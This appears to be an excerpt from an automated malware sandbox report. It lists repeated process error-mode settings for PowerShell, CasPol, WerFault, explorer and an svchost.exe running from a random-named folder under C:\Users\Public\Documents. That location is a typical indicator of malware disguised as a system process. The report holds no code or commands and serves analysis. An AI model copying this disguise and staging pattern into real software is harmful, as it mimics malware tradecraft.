        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
